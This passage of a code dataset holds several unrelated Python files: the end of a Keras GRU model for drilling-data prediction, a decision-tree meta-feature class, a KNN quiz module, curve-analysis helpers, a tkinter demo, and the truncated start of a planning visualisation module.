attribute in list(y_test):\n if fill_method[attribute] == 'linterp':\n y_test = y_test.interpolate().ffill().bfill().rolling(5, center=True).mean().ffill().bfill()\n \n \n \n \n \n \n \n #%%\n \n ## Resampling\n \n from sklearn.neighbors import RadiusNeighborsRegressor\n \n reg = RadiusNeighborsRegressor()\n \n step_length = index_mean * hstep_extension\n \n i_train_min = np.min(X_train[index])\n i_train_max = np.max(X_train[index])\n i_test_min = np.min(X_test[index])\n i_test_max = np.max(X_test[index])\n \n index_train = np.arange(i_train_min, i_train_max, step_length).reshape(-1,1)\n index_test = np.arange(i_test_min, i_test_max, step_length).reshape(-1,1)\n \n \n reg = RadiusNeighborsRegressor(radius=index_maxgap, weights='distance')\n \n reg.fit(X_train[index].to_numpy().reshape(-1,1), y_train[target].to_numpy())\n y_train = pd.DataFrame()\n y_train[target] = reg.predict(index_train)\n \n reg.fit(X_test[index].to_numpy().reshape(-1,1), y_test[target].to_numpy())\n y_test = pd.DataFrame()\n y_test[target] = reg.predict(index_test)\n \n X_train_resampled = pd.DataFrame()\n for attribute in list(X_train):\n reg.fit(X_train[index].to_numpy().reshape(-1,1), X_train[attribute].to_numpy())\n X_train_resampled[attribute] = reg.predict(index_train)\n \n X_train = X_train_resampled\n \n \n \n X_test_resampled = pd.DataFrame()\n for attribute in list(X_train):\n reg.fit(X_test[index].to_numpy().reshape(-1,1), X_test[attribute].to_numpy())\n X_test_resampled[attribute] = reg.predict(index_test)\n \n X_test = X_test_resampled\n #%%\n \n ## Inclination to delta inclination convertion needed here!\n \n convert_to_diff = []#['MWD Continuous Inclination dega']\n lcs_list = ['MWD Continuous Inclination dega'] #list of parameters that are to be in local coordinate system\n \n for attr in convert_to_diff:\n if attr == target:\n y_train[attr] = y_train[attr].diff().bfill() #bfill to kill initial NaN\n y_test[attr] = y_test[attr].diff().bfill()\n else:\n X_train[attr] = X_train[attr].diff().bfill()\n X_test[attr] = X_test[attr].diff().bfill()\n #%%\n \n ## Scaling the data. 
Note that range is decide on the training dataset only!\n \n scaler_X = MinMaxScaler()\n scaler_y = MinMaxScaler()\n \n X_train[X_train.columns] = scaler_X.fit_transform(X_train[X_train.columns])\n y_train[y_train.columns] = scaler_y.fit_transform(y_train[y_train.columns])\n \n ## Test portion is tranformed based on the existing scaler\n X_test[X_test.columns] = scaler_X.transform(X_test[X_test.columns])\n y_test[y_test.columns] = scaler_y.transform(y_test[y_test.columns])\n \n \n #%%\n \n ## Dataframe for use in correlation analysis, where X_train and y_train is\n ## together\n df_train = X_train\n df_train = df_train.merge(y_train, how='outer', left_index=True,\n right_index=True)\n \n #%%\n \n ## Choice of attribute selection method done on the complete dataset\n ## NOTE: PCA has to be applied AFTER the split, never before!\n \n # print('''Choose attribute selection method:\n # 1) pearson coefficient\n # 2) PCA\n # 3) ppscore''')\n \n asel_choice = '2'#input('Your choice:')\n \n #%%\n ## Simple correlation, pearson, straight from Pandas\n \n ## Note that correlations are re-done after each split, and done only on the\n ## training dataset!\n \n ## [] Ensure that Index is carried forward!\n \n PCA_n = -1 #i.e. not in use\n \n \n if asel_choice == '1':\n \n dfs_corr = df_train.corr(method='pearson')\n corr_values = dfs_corr[target].to_numpy()\n corr_index = dfs_corr[target].index.to_numpy()\n \n corr_m = np.column_stack((corr_values, corr_index))\n \n for i in range(len(corr_m)):\n if np.isnan(corr_m[i,0]):\n corr_m[i,0] = 0\n else:\n corr_m[i,0] = np.abs(corr_m[i,0])\n \n corr_m = corr_m[corr_m[:,0].argsort()]\n \n keep_columns = corr_m[-1-hAttrCount:-1,1]\n\n \n X_train = X_train[keep_columns]\n X_test = X_test[keep_columns]\n \n \n \n ## PCA based \n \n \n elif asel_choice == '2':\n from sklearn.decomposition import PCA\n \n keep_columns = [] #empty for future code compatibility\n\n \n PCA_n = hAttrCount\n \n # applied after sensitivity analysis\n \n ## ppscore based\n \n elif asel_choice == '3':\n import ppscore as pps\n dfs_corr = pps.predictors(df_train, target, output='list')\n \n \n min_required_ppscore = 0.3\n \n keep_columns = []\n for i in range(len(dfs_corr)):\n if dfs_corr[i]['ppscore'] > min_required_ppscore:\n keep_columns.append(dfs_corr[i]['x'])\n \n X_train = X_train[keep_columns]\n X_test = X_test[keep_columns]\n \n \n else:\n sys.exit(\"Error, incorrect attribute selection choice\")\n \n \n #%%\n \n ## Sensitivity study gets applied here. Note that sensitivity for PCA is done\n ## on ALL available parameters, while for ppscore or pearson only on selected ones\n \n \n #%%\n \n ## Applying PCA. 
It is done late to preserve all attributes for sensitivity test\n if PCA_n != -1:\n scaler_pca = MinMaxScaler() # new scaler here because PCA can push \n # variables out of (-1,1) bounds\n \n pca = PCA(n_components = PCA_n)\n \n X_train = pca.fit_transform(X_train)\n X_train = scaler_pca.fit_transform(X_train)\n \n X_test = pca.transform(X_test)\n X_test = scaler_pca.transform(X_test)\n \n \n \n \n \n #%%\n \n ## Data shaping\n \n ## from now on, arrays are being morphed into shapes valid for RNN+MLP\n \n memory = int(hMemoryMeters/step_length)\n \n imagination = int(imagination_meters/step_length)\n \n X_attr = list(X_train)\n \n try:\n X_train = X_train.to_numpy() \n X_test = X_test.to_numpy()\n y_train = y_train.to_numpy()\n y_test = y_test.to_numpy() \n except:\n y_train = y_train.to_numpy()\n y_test = y_test.to_numpy()\n \n X_test = np.concatenate([X_train[-memory+1:,:], X_test], axis=0)\n y_test = np.concatenate([y_train[-memory+1:], y_test], axis=0)\n #%%\n \n def prepare(data, start, stop, cut_margin = 0, lcs=False):\n memory = stop-start\n stack = []\n for i in range(memory):\n stack.append(np.roll(data, -i))\n \n stack = np.flip(np.rot90(stack), axis=0)[start:-memory+1-cut_margin]\n \n if lcs == True:\n zero = stack[:,0]\n \n for j in range(len(zero)):\n stack[j] = stack[j] - zero[j]\n return stack\n \n target_lcs_correction = 1\n \n if target in lcs_list:\n X_train_RNN = prepare(np.squeeze(y_train), 0, memory, cut_margin = imagination, lcs=True)\n X_test_RNN = prepare(np.squeeze(y_test), 0, memory, cut_margin = imagination, lcs=True)\n \n y_train_RNN = prepare(np.squeeze(y_train), memory, memory+imagination, lcs=True)\n y_test_RNN = prepare(np.squeeze(y_test), memory, memory+imagination, lcs=True)\n \n offset_train = X_train_RNN[:,-1]\n offset_test = X_test_RNN[:,-1]\n \n for k in range(len(offset_train)):\n y_train_RNN[k] = y_train_RNN[k] + offset_train[k]\n \n for k in range(len(offset_test)):\n y_test_RNN[k] = y_test_RNN[k] + offset_test[k]\n \n target_lcs_correction = 1/np.max(y_train_RNN)\n \n y_train_RNN = y_train_RNN * target_lcs_correction\n X_train_RNN = X_train_RNN * target_lcs_correction\n y_test_RNN = y_test_RNN * target_lcs_correction\n X_test_RNN = X_test_RNN * target_lcs_correction\n \n else:\n X_train_RNN = prepare(np.squeeze(y_train), 0, memory, cut_margin = imagination)\n X_test_RNN = prepare(np.squeeze(y_test), 0, memory, cut_margin = imagination)\n y_train_RNN = prepare(np.squeeze(y_train), memory, memory+imagination)\n y_test_RNN = prepare(np.squeeze(y_test), memory, memory+imagination)\n \n #%%\n \n \n \n \n X_train_MLP = []\n X_test_MLP = []\n \n #%%\n if PCA_n == -1:\n X_lcs_correction = [1]*len(X_train[0])\n \n for i in range(len(X_train[0])):\n if keep_columns[i] in lcs_list:\n X_train_MLP.append(prepare(X_train[:,i],memory,memory+imagination, lcs=True))\n X_lcs_correction[i] = 1/np.max(X_train_MLP[i])\n X_train_MLP[i] = X_train_MLP[i]*X_lcs_correction[i]\n else:\n X_train_MLP.append(prepare(X_train[:,i],memory,memory+imagination))\n \n X_train_MLP = np.asarray(X_train_MLP)\n X_train_MLP = np.concatenate(X_train_MLP[:,:, np.newaxis], axis = 1)\n X_train_MLP = np.rot90(X_train_MLP, axes=(1,2), k=3)\n \n \n \n \n \n for i in range(len(X_test[0])):\n if keep_columns[i] in lcs_list:\n X_test_MLP.append(prepare(X_test[:,i],memory,memory+imagination, lcs=True))\n X_test_MLP[i] = X_test_MLP[i]*X_lcs_correction[i]\n else:\n X_test_MLP.append(prepare(X_test[:,i],memory,memory+imagination))\n \n X_test_MLP = np.asarray(X_test_MLP)\n X_test_MLP = 
np.concatenate(X_test_MLP[:,:, np.newaxis], axis = 1)\n X_test_MLP = np.rot90(X_test_MLP, axes=(1,2), k=3)\n \n else:\n for i in range(len(X_train[0])):\n X_train_MLP.append(prepare(X_train[:,i],memory,memory+imagination))\n \n X_train_MLP = np.asarray(X_train_MLP)\n X_train_MLP = np.concatenate(X_train_MLP[:,:, np.newaxis], axis = 1)\n X_train_MLP = np.rot90(X_train_MLP, axes=(1,2), k=3)\n \n for i in range(len(X_test[0])):\n X_test_MLP.append(prepare(X_test[:,i],memory,memory+imagination))\n \n X_test_MLP = np.asarray(X_test_MLP)\n X_test_MLP = np.concatenate(X_test_MLP[:,:, np.newaxis], axis = 1)\n X_test_MLP = np.rot90(X_test_MLP, axes=(1,2), k=3)\n #%%\n \n X_train_RNN_m = X_train_RNN[:,:,np.newaxis]\n #X_train_MLP_m = X_train_MLP[:,:,np.newaxis]\n X_train_m = [X_train_RNN_m, X_train_MLP]#_m]\n \n X_test_RNN_m = X_test_RNN[:,:,np.newaxis]\n #X_test_MLP_m = X_test_MLP[:,:,np.newaxis]\n X_test_m = [X_test_RNN_m, X_test_MLP]#_m]\n #%%\n \n \n \n #%%\n \n ## Local coordinate system\n \n ## Just a cumsum on parameter converted to delta earlier\n \n \n #%%\n \n ## ML model definition\n \n from tensorflow.keras import Model, Input\n from tensorflow.keras.layers import (Dense, Dropout, GRU, Flatten,\n GaussianNoise, concatenate, LSTM,\n Bidirectional, TimeDistributed)\n from tensorflow.keras.layers import Conv1D\n from tensorflow.keras.layers import MaxPool1D\n from tensorflow.keras.callbacks import EarlyStopping\n from tensorflow.keras.callbacks import ModelCheckpoint\n import tensorflow as tf\n \n from tensorflow.keras.models import load_model\n \n physical_devices = tf.config.list_physical_devices('GPU') \n tf.config.experimental.set_memory_growth(physical_devices[0], True)\n \n tf.keras.backend.clear_session()\n \n visible1 = Input(shape=(memory,1))\n \n \n visible2 = Input(shape=((imagination),len(X_train[0])))\n\n x1 = TimeDistributed(Dense(hDense4))(visible1) \n x1 = GRU(units=hGRU, kernel_initializer = 'glorot_uniform',\n recurrent_initializer='orthogonal',\n bias_initializer=\"zeros\", kernel_regularizer='l2', recurrent_regularizer=None,\n bias_regularizer=None, activity_regularizer=None, kernel_constraint=None,\n recurrent_constraint=None, bias_constraint=None, return_sequences=True,\n return_state=False, stateful=False)(x1)\n\n x1 = Dense(imagination)(x1)\n x1 = Flatten()(x1)\n x1 = Dropout(hDrop1)(x1)\n\n\n\n x2 = TimeDistributed(Dense(hDense5))(visible2)\n dense2 = Dense(hDense1, activation=\"linear\")(x2)\n drop2 = Dropout(hDrop2)(dense2)\n flat2 = Flatten()(drop2)\n dense2 = Dense(imagination, activation='linear')(flat2)\n drop2 = Dropout(hDrop3)(flat2)\n \n combined = concatenate([x1, drop2])\n \n z = Dense(hDense3, activation=\"relu\")(combined)\n z = Dense(imagination, activation=\"linear\")(z)\n\n \n model = Model(inputs=[visible1, visible2], outputs=z)\n \n \n \n \n es = EarlyStopping(monitor='val_loss', mode='min', verbose=0, patience=50)\n \n mc = ModelCheckpoint('best_model.h5', monitor='val_loss',\n mode='min', save_best_only=True, verbose=0)\n \n\n model.compile(optimizer='adam',loss='mean_squared_error')\n plot_model(model, to_file='model_plot.png', show_shapes=True, show_layer_names=True)\n \n ## Training \n rowcount = len(y_train_RNN)\n val_border = int(rowcount*0.85)\n \n X_train_m_a = []\n X_train_m_b = []\n \n X_train_m_a.append(X_train_m[0][:val_border])\n X_train_m_a.append(X_train_m[1][:val_border])\n \n X_train_m_b.append(X_train_m[0][val_border:])\n X_train_m_b.append(X_train_m[1][val_border:])\n \n \n \n y_train_RNN_a = y_train_RNN[:val_border]\n 
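# Note: the last 15% of the training window (from val_border on) is held\n    # out as the validation split that drives the EarlyStopping and\n    # ModelCheckpoint callbacks below; e.g. with 1000 training rows,\n    # val_border == 850.\n    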
y_train_RNN_b = y_train_RNN[val_border:]\n \n \n history = model.fit(X_train_m_a,y_train_RNN_a,validation_data=(X_train_m_b,y_train_RNN_b),\n epochs=2000, verbose=0, batch_size=32,\n callbacks=[es, mc])\n \n model = load_model('best_model.h5')\n \n\n result_test = model.evaluate(X_test_m, y_test_RNN, verbose=0)\n \n # image = np.abs(y_test_RNN*target_lcs_correction - result_test*target_lcs_correction)\n # mae = np.mean(image, axis=0)\n\n\n # Plots\n pred = model.predict(X_train_m, verbose=0)\n \n for i in range(10):\n s = np.random.randint(0, len(y_train_RNN))\n \n x = np.arange(0,len(X_train_RNN[0]),1)\n \n plt.title('Train')\n plt.plot(x, X_train_RNN[s], label='RNN input')\n \n x = np.arange(len(X_train_RNN[0]), len(X_train_RNN[0]) + len(y_train_RNN[0]),1)\n plt.plot(x,y_train_RNN[s], label='RNN output, true')\n \n \n \n plt.plot(x,pred[s], label='RNN output, predicted')\n plt.legend()\n \n \n plt.show()\n \n pred = model.predict(X_test_m)\n \n \n for i in range(5):\n s = np.random.randint(0, len(y_test_RNN))\n \n x = np.arange(0,len(X_test_RNN[0]),1)\n \n plt.plot(x, X_test_RNN[s], label='RNN input')\n \n x = np.arange(len(X_test_RNN[0]), len(X_test_RNN[0]) + len(y_test_RNN[0]),1)\n plt.plot(x,y_test_RNN[s], label='RNN output, true')\n \n \n plt.title('test')\n plt.plot(x,pred[s], label='RNN output, predicted')\n plt.legend()\n plt.show()\n \n truth = y_test_RNN/target_lcs_correction/scaler_y.scale_\n \n pred = pred/target_lcs_correction/scaler_y.scale_\n\n if np.isnan(result_test):\n result_test = 0\n #print(-np.log10(result_test))\n \n print(f'MAE: {np.average(np.abs(truth-pred))}')\n return truth, pred, -np.log10(result_test)\n\n\n#%%\n# Tuning\n\ndef optimize_me(hGRU,\n hDrop1,\n hDrop2, \n hDrop3,\n hDense1,\n hDense2,\n hDense3,\n hDense4,\n hDense5):\n truths = []\n preds = []\n quals = []\n for i in np.arange(0.2,0.85,0.01):\n print(f'Working on {i*100}%')\n truth, pred, qual = run_me(i, hGRU,\n hDrop1,\n hDrop2, \n hDrop3,\n hDense1,\n hDense2,\n hDense3,\n hDense4,\n hDense5)\n #print(f'Quality is {qual:.2f}')\n truths.append(truth)\n preds.append(pred)\n quals.append(qual)\n \n \n diffs = []\n \n for i in range(len(truths)):\n diffs.append(np.average(np.abs(truths[i] - preds[i]), axis=0))\n \n\n print(-np.average(diffs))\n return truths, preds, quals, diffs\n\ntruths, preds, quals, diffs = optimize_me(382, 0.5, 0.5, 0.5, 1, 32, 128, 1, 128)\nsns.heatmap(diffs, cmap='viridis', vmax=8)\nplt.show()\n","sub_path":"tape.py","file_name":"tape.py","file_ext":"py","file_size_in_byte":26417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"272064764","text":"import numpy as np\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom meta_gan.feature_extraction.MetaFeatureApi import MetaFeature\nfrom sklearn.tree._tree import Tree\n\n\nclass DecisionTreeMeta(MetaFeature):\n def getLength(self) -> int:\n height = 1\n leaves_num = 1\n node_num = 1\n width = 1\n dev = 4\n max = 4\n mean = 4\n min = 3\n result = sum([height, leaves_num, node_num, width, dev, max, mean, min])\n return result\n\n @staticmethod\n def getHeight(tree: Tree) -> int:\n children_left = tree.children_left\n children_right = tree.children_right\n\n def walk(node_id):\n if children_left[node_id] != children_right[node_id]:\n left_max = 1 + walk(children_left[node_id])\n right_max = 1 + walk(children_right[node_id])\n return max(left_max, right_max)\n else: # leaf\n return 1\n\n root_node_id = 0\n return walk(root_node_id)\n\n @staticmethod\n def 
getLeavesNumber(tree: Tree) -> int:\n children_left = tree.children_left\n children_right = tree.children_right\n\n def walk(node_id):\n if children_left[node_id] != children_right[node_id]:\n left_max = 0 + walk(children_left[node_id])\n right_max = 0 + walk(children_right[node_id])\n return left_max + right_max\n else: # leaf\n return 1\n\n root_node_id = 0\n return walk(root_node_id)\n\n @staticmethod\n def getNodeNumber(tree: Tree) -> int:\n children_left = tree.children_left\n children_right = tree.children_right\n\n def walk(node_id):\n if children_left[node_id] != children_right[node_id]:\n left_max = 0 + walk(children_left[node_id])\n right_max = 0 + walk(children_right[node_id])\n return 1 + left_max + right_max\n else: # leaf\n return 0\n\n root_node_id = 0\n return walk(root_node_id)\n\n @staticmethod\n def getWidth(tree: Tree, height: int) -> int:\n children_left = tree.children_left\n children_right = tree.children_right\n\n def walk(node_id, level):\n if level == 0:\n return 1\n if children_left[node_id] == children_right[node_id]:\n return 0\n if children_left[node_id] != children_right[node_id]:\n left_max = walk(children_left[node_id], level - 1)\n right_max = walk(children_right[node_id], level - 1)\n return left_max + right_max\n else: # leaf\n return 0\n\n root_node_id = 0\n width = 0\n for i in range(height):\n width = max(width, walk(root_node_id, i))\n return width\n\n def getAttrs(self, tree: Tree) -> [float]:\n attrs = [0.0] * self.features\n children_left = tree.children_left\n children_right = tree.children_right\n feature = tree.feature\n\n def walk(node_id, counts) -> [float]:\n if children_left[node_id] != children_right[node_id]:\n counts[feature[node_id]] += 1\n left = walk(children_left[node_id], counts)\n right = walk(children_right[node_id], left)\n return right\n else:\n return counts\n\n root_node_id = 0\n return walk(root_node_id, attrs)\n\n def getBranches(self, tree: Tree) -> [float]:\n branches = [0.0] * self.getLeavesNumber(tree)\n children_left = tree.children_left\n children_right = tree.children_right\n\n def walk(node_id, counts, lenght, index) -> [float]:\n if children_left[node_id] == children_right[node_id]:\n counts[index] += lenght\n return index + 1\n else:\n left = walk(children_left[node_id], counts, lenght + 1, index)\n right = walk(children_right[node_id], counts, lenght + 1, left)\n return right\n\n root_node_id = 0\n walk(root_node_id, branches, 0, 0)\n return branches\n\n def getClasses(self, tree: Tree) -> [float]:\n classes = [0.0] * 2\n children_left = tree.children_left\n children_right = tree.children_right\n value = tree.value\n\n def walk(node_id, counts) -> [float]:\n if children_left[node_id] == children_right[node_id]:\n class_no = np.argmax(value[node_id][0])\n counts[class_no] += 1\n return counts\n else:\n left = walk(children_left[node_id], counts)\n right = walk(children_right[node_id], left)\n return right\n\n root_node_id = 0\n return walk(root_node_id, classes)\n\n def getLevels(self, tree: Tree) -> [float]:\n height = self.getHeight(tree)\n levels = [0.0] * (height + 1)\n children_left = tree.children_left\n children_right = tree.children_right\n\n def walk(node_id, counts, level, height) -> [float]:\n if children_left[node_id] == children_right[node_id]:\n return\n if height == 0:\n counts[level] += 1\n walk(children_left[node_id], counts, level, height - 1)\n walk(children_right[node_id], counts, level, height - 1)\n return\n\n root_node_id = 0\n for i in range(height):\n walk(root_node_id, levels, i, i)\n 
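# e.g. for a stump (a single root split with two leaf children)\n        # getHeight() returns 2, so levels == [1.0, 0.0, 0.0]: one internal\n        # node at depth 0 and none deeper, since walk() skips leaves.\n        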
return levels\n\n    def max_(self, inp: [float]) -> float:\n        return max(inp)\n\n    def mean_(self, inp: [float]) -> float:\n        return np.mean(np.array(inp)).item(0)\n\n    def min_(self, inp: [float]) -> float:\n        return min(inp)\n\n    def dev_(self, inp: [float]) -> float:\n        return np.std(np.array(inp)).item(0)\n\n    def getMax(self, getAttrs, getBranches, getClasses, getLevels) -> [float]:\n        attr = self.max_(getAttrs)\n        branches = self.max_(getBranches)\n        classes = self.max_(getClasses)\n        levels = self.max_(getLevels)\n        return [attr, branches, classes, levels]\n\n    def getMin(self, getAttrs, getBranches, getClasses) -> [float]:\n        attr = self.min_(getAttrs)\n        branches = self.min_(getBranches)\n        classes = self.min_(getClasses)\n        return [attr, branches, classes]\n\n    def getDev(self, getAttrs, getBranches, getClasses, getLevels) -> [float]:\n        attr = self.dev_(getAttrs)\n        branches = self.dev_(getBranches)\n        classes = self.dev_(getClasses)\n        levels = self.dev_(getLevels)\n        return [attr, branches, classes, levels]\n\n    def getMean(self, getAttrs, getBranches, getClasses, getLevels) -> [float]:\n        attr = self.mean_(getAttrs)\n        branches = self.mean_(getBranches)\n        classes = self.mean_(getClasses)\n        levels = self.mean_(getLevels)\n        return [attr, branches, classes, levels]\n\n    def getMeta(self, zero_in: np.ndarray, one_in: np.ndarray) -> np.ndarray:\n        data_in = self.data(zero_in, one_in)\n        labels_in = self.labels()\n        d_tree = DecisionTreeClassifier(random_state=0)\n        d_tree.fit(data_in, labels_in)\n        tree = d_tree.tree_\n\n        height = self.getHeight(tree)\n        leaves_num = self.getLeavesNumber(tree)\n        node_num = self.getNodeNumber(tree)\n        width = self.getWidth(tree, height)\n\n        attr = self.getAttrs(tree)\n        branches = self.getBranches(tree)\n        classes = self.getClasses(tree)\n        levels = self.getLevels(tree)\n\n        max = self.getMax(attr, branches, classes, levels)\n        min = self.getMin(attr, branches, classes)\n        dev = self.getDev(attr, branches, classes, levels)\n        mean = self.getMean(attr, branches, classes, levels)\n        result = [height, leaves_num, node_num, width]\n        result.extend(max)\n        result.extend(min)\n        result.extend(dev)\n        result.extend(mean)\n        return np.array(result)\n\n\nif __name__ == '__main__':\n    meta = DecisionTreeMeta(4, 3)\n    arr = np.array([[1, 1, 1, 1],\n                    [0.2, 0.3, 0, 0],\n                    [0.2, 0, 0, 1]])\n    print(meta.getMeta(arr, arr - 0.5))\n    print(meta.getLength())\n","sub_path":"meta_gan/feature_extraction/DecisionTreeMeta.py","file_name":"DecisionTreeMeta.py","file_ext":"py","file_size_in_byte":8214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"458406556","text":"import matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport requests\r\nfrom io import BytesIO\r\nimport sys\r\nsys.path.insert(1, '../../../common')\r\nfrom checkpoint import *\r\n\r\ndescripcion_1 = '''\r\nDuring the training of a classification model:\r\n'''\r\nopciones_1 = ['The model learns to predict a numeric value given a set of attributes',\r\n              'The model learns to predict a categorical value given a set of attributes',\r\n              'The model tries to group the data by closeness',\r\n              'None of the above is correct']\r\nfeedback_1 = ['If it predicted a numeric value it would be a regression model rather than a classification model.',\r\n              'Exactly!',\r\n              'Although some classification models rely on notions of closeness or distance, such as KNN, the goal of a classifier is not to group the most similar data points together.',\r\n              'Go over the options again, because one of them is correct!']\r\ntest_1 = create_multiple_choice(descripcion_1, opciones_1, opciones_1[1], feedback_1)\r\n\r\n\r\ndescripcion_2 = '''\r\nKNN is an instance-based model because:\r\n'''\r\nopciones_2 = ['It trains on instances, that is, on examples',\r\n              'It generalizes what it learns from the instances it trains on',\r\n              'It memorizes the training instances and then classifies new data based on the memorized instances',\r\n              'None of the above is correct']\r\nfeedback_2 = ['Is there any machine learning model that does not learn from examples?',\r\n              'Any predictive model generalizes from its training data',\r\n              'Perfect! We saw that KNN compares each test point against all training points to find the nearest neighbors, hence the notion of an instance-based model.',\r\n              'Go over the options again, because one of them is correct!']\r\ntest_2 = create_multiple_choice(descripcion_2, opciones_2, opciones_2[2], feedback=feedback_2)\r\n\r\n\r\ndescripcion_3 = '''\r\nThe hyperparameter k of KNN (in Scikit-Learn, `n_neighbors`):\r\n'''\r\nopciones_3 = ['Refers to the number of instances the model will memorize',\r\n              'Increases the bias of the model',\r\n              'Refers to the number of neighbors considered when classifying each new observation',\r\n              'Defines which particular case of the Minkowski distance metric will be used']\r\nfeedback_3 = ['KNN memorizes all the instances of the training set.',\r\n              'Although a larger k typically means a more biased model, this does not mean that the value of k per se is associated with higher bias.',\r\n              'Well done! k is the model hyperparameter that defines how many neighbors are considered when making predictions.',\r\n              'In this case it is not k but p.']\r\n\r\ntest_3 = create_multiple_choice(descripcion_3, opciones_3, opciones_3[2], feedback_3)\r\n\r\n\r\ndescripcion_4 = '''\r\nIf every \"block\" of this grid-like street map has length 1, what is the Euclidean distance between the points? And the Manhattan distance?\r\n'''\r\nopciones_4 = ['Euclidean distance = 12, Manhattan distance = 8.49',\r\n              'Euclidean distance = 36, Manhattan distance = 12',\r\n              'Euclidean distance = 8.49, Manhattan distance = 12',\r\n              'Euclidean distance = 12, Manhattan distance = 12']\r\nfeedback_4 = ['Check the formulas!',\r\n              'Check the formulas!',\r\n              'Correct!',\r\n              'Check the formulas!']\r\n\r\ndef test_4():\r\n    response = requests.get('https://upload.wikimedia.org/wikipedia/commons/thumb/0/08/Manhattan_distance.svg/800px-Manhattan_distance.svg.png')\r\n    img = Image.open(BytesIO(response.content))\r\n    basewidth = 350\r\n    wpercent = (basewidth/float(img.size[0]))\r\n    hsize = int((float(img.size[1])*float(wpercent)))\r\n    img = img.resize((basewidth,hsize), Image.ANTIALIAS)\r\n    display(img)\r\n    create_multiple_choice(descripcion_4, opciones_4, opciones_4[2], feedback_4)()\r\n\r\n\r\ndescripcion_5 = \"\"\"\r\nConsider the following confusion matrix. What is the accuracy of the model?\r\n\"\"\"\r\nopciones_5 = ['70/120', '60/90', '10/30', '50/120']\r\nfeedback_5 = ['Correct!',\r\n              'Remember that accuracy measures the proportion of correct classifications out of the total.',\r\n              'Remember that accuracy measures the proportion of correct classifications out of the total.',\r\n              'Remember that accuracy measures the proportion of correct classifications out of the total.']\r\n\r\ndef test_5():\r\n\r\n    fig = plt.figure()\r\n    \r\n    tabla = plt.table(cellText = np.array([[60, 20, 80],\r\n                                           [30, 10, 40],\r\n                                           [90, 30, 120]]),\r\n                      cellLoc = 'center',\r\n                      colLabels=['Predicts negative class', 'Predicts positive class', 'Total'],\r\n                      rowLabels=['Negative class', 'Positive class', 'Total'],\r\n                      loc='left')\r\n    tabla.scale(2, 5)\r\n    tabla.set_fontsize(30)\r\n    plt.axis('off');\r\n    \r\n    create_multiple_choice(descripcion_5, opciones_5, opciones_5[0], feedback_5, fig=fig)()","sub_path":"CLASE_19_Intro-Clasif-KNN/Notebooks/checkpoint_knn.py","file_name":"checkpoint_knn.py","file_ext":"py","file_size_in_byte":5394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"394609051","text":"import numpy as np\nfrom scipy import signal\n\n\ndef calculo_maximo(data, time):\n    \"\"\"\n    Calculates the largest value of the incoming data, and returns the time and position at which this largest value is found.\n    param data: Data in which the max is searched.\n    param time: Array of time, corresponds to the time of each data entry\n    return: max value, time at which it occurs, and the position of the array\n    \"\"\"\n    input_data = np.array(data)\n    pos_max = signal.find_peaks_cwt(input_data, np.arange(1, 150))[0]\n    time_max = np.array(time)[pos_max]\n    max_element = np.round(input_data[pos_max], 2)\n\n    return max_element, time_max, pos_max\n\n\ndef calculo_pendiente(data, time):\n    \"\"\"\n    Returns the initial slope, taking the rise time of the curve as the interval where the data rises from 10% of the maximum to 90% of the maximum.\n    param data: Input data, Y-axis\n    param time: Time data, X-axis\n    return: value of slope, initial time, final time, initial value, final value\n    \"\"\"\n    max_data, time_max, pos_max = calculo_maximo(data, time)\n    por10 = max_data*0.1\n    por90 = max_data*0.9\n    first = 0\n    last = 0\n    for valor in np.array(data):\n        if valor > por10 and first == 0:\n            first = valor\n            continue\n        if valor < por90:\n            last = valor\n            continue\n        else:\n            break\n    pos_first = np.where(np.array(data) == first)[0][0]\n    pos_last = np.where(np.array(data) == last)[0][0]\n    time_first = np.array(time).astype(np.float)[pos_first]\n    time_last = np.array(time).astype(np.float)[pos_last]\n    try:\n        p = np.round((last-first)/(time_last-time_first), 2)\n    except ZeroDivisionError:\n        p = 0\n    return p, time_first, time_last, first, last\n\n\ndef calculo_area_curva(data, time):\n    \"\"\"\n    Given the time and data, calculate the area under the curve using NumPy trapz\n    param data: Array with the values of the averages of the intensities\n    param time: Array with the time values of the images\n    :return: calculated area, rounded to the second decimal place\n    \"\"\"\n    input_data = np.array(data)\n    input_time = np.array(time)\n    input_time = input_time.astype(np.float)\n    area = np.round(np.trapz(input_data, input_time), 2)\n    return area
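\n\n# Usage sketch (hypothetical values):\n# calculo_area_curva([0.0, 1.5, 2.0], ['0', '1', '2'])  # -> 2.5\n# (trapezoidal rule: (0 + 1.5)/2 + (1.5 + 2)/2 == 2.5)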
\n","sub_path":"Interface/utils/valores_curvas.py","file_name":"valores_curvas.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"161549268","text":"# ch8_2.py\nfrom tkinter import *\n\nroot = Tk()\nroot.title(\"ch8_2\")\n\n# Store each frame's background color and cursor shape in a dict\nfms = {'red':'cross','green':'boat','blue':'clock'}\nfor fmColor in fms:          # create 3 frames with different background colors and cursor shapes\n    Frame(root,bg=fmColor,cursor=fms[fmColor],\n          height=50,width=200).pack(side=LEFT)\n\nroot.mainloop()\n\n\n\n\n\n\n\n\n","sub_path":"_4.python/__code/Python GUI 設計活用 tkinter之路/ch8/ch8_2.py","file_name":"ch8_2.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"447793574","text":"\"\"\"This module will compute the visualisation file by using the stages' predicates and animation rules\"\"\"\n# -----------------------------Authorship-----------------------------------------\n# -- Authors : YD\n# -- Group : Planning Visualisation\n# -- Date : 16/September/2018\n# -- Version : 2.0\n# --------------------------------------------------------------------------------\n# -----------------------------Reviewer-------------------------------------------\n# -- Authors : Sai\n# -- Group : Planning Visualisation\n# -- Date : 16/October/2018\n# -- Version : 2.0\n# --------------------------------------------------------------------------------\nimport copy\nimport os\nimport sys\n\nsys.path.append(os.path.abspath(os.path.dirname(__file__) + '/../' + \"extension\"))\nsys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + \"vfg/solver\"))\nsys.path.append(os.path.abspath(os.path.dirname(__file__)))\nimport Custom_functions\nimport Initialise\nimport Subgoal\n\n\ndef 